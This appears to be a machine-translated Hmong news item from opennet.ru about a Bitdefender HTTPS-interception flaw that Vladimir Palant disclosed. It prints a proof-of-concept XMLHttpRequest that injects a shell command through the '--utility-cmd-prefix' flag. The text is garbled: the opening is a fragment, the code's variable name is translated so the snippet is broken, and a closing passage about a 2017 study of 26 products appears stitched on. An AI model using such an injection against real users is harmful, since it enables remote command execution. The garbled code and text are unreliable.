Vladimir Palant, tus tsim ntawm Adblock Plus,
Qhov laj thawj ntawm qhov teeb meem yog tias Bitdefender antivirus ua qhov cuam tshuam hauv zos ntawm HTTPS tsheb los ntawm kev hloov daim ntawv pov thawj TLS thawj ntawm lub xaib. Ib daim ntawv pov thawj hauv paus ntxiv yog ntsia rau ntawm tus neeg siv khoom lub cev, uas ua rau nws muaj peev xwm zais kev ua haujlwm ntawm kev tshuaj xyuas tsheb siv. Lub antivirus wedges nws tus kheej rau hauv kev tiv thaiv kev khiav tsheb thiab ntxig nws tus kheej JavaScript code rau hauv qee nplooj ntawv los siv lub Safe Search muaj nuj nqi, thiab nyob rau hauv cov ntaub ntawv ntawm teeb meem nrog daim ntawv pov thawj kev ruaj ntseg kev twb kev txuas, nws hloov lub rov qab yuam kev nplooj ntawv nrog nws tus kheej. Txij li cov nplooj ntawv yuam kev tshiab tau muab rau sawv cev ntawm tus neeg rau zaub mov raug qhib, lwm nplooj ntawv ntawm tus neeg rau zaub mov ntawd tau nkag mus rau tag nrho cov ntsiab lus tso los ntawm Bitdefender.
Thaum qhib lub vev xaib tswj hwm los ntawm tus neeg tawm tsam, qhov chaw ntawd tuaj yeem xa XMLHttpRequest thiab feign teeb meem nrog HTTPS daim ntawv pov thawj thaum teb, uas yuav ua rau rov qab los ntawm nplooj ntawv yuam kev spoofed los ntawm Bitdefender. Txij li thaum nplooj ntawv yuam kev raug qhib hauv cov ntsiab lus ntawm tus neeg tawm tsam lub npe, nws tuaj yeem nyeem cov ntsiab lus ntawm nplooj ntawv spoofed nrog Bitdefender tsis. Cov nplooj ntawv muab los ntawm Bitdefender kuj tseem muaj qhov tseem ceeb ntawm kev sib tham uas tso cai rau koj siv lub Bitdefender API sab hauv los qhib qhov kev sib tham Safepay browser cais, qhia meej cov kab hais kom ua tsis ncaj ncees lawm, thiab txhawm rau tshaj tawm cov lus txib siv "--utility-cmd-prefix" chij. Ib qho piv txwv ntawm kev siv (param1 thiab param2 yog qhov tseem ceeb tau txais los ntawm nplooj ntawv yuam kev):
var thov = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Cia peb nco qab tias qhov kev tshawb fawb tau ua hauv 2017
Tsuas yog 11 ntawm 26 cov khoom tau muab cov khoom siv cipher tam sim no. 5 lub tshuab tsis tau txheeb xyuas daim ntawv pov thawj (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security thiab Total Security cov khoom raug tawm tsam
Tau qhov twg los: opennet.ru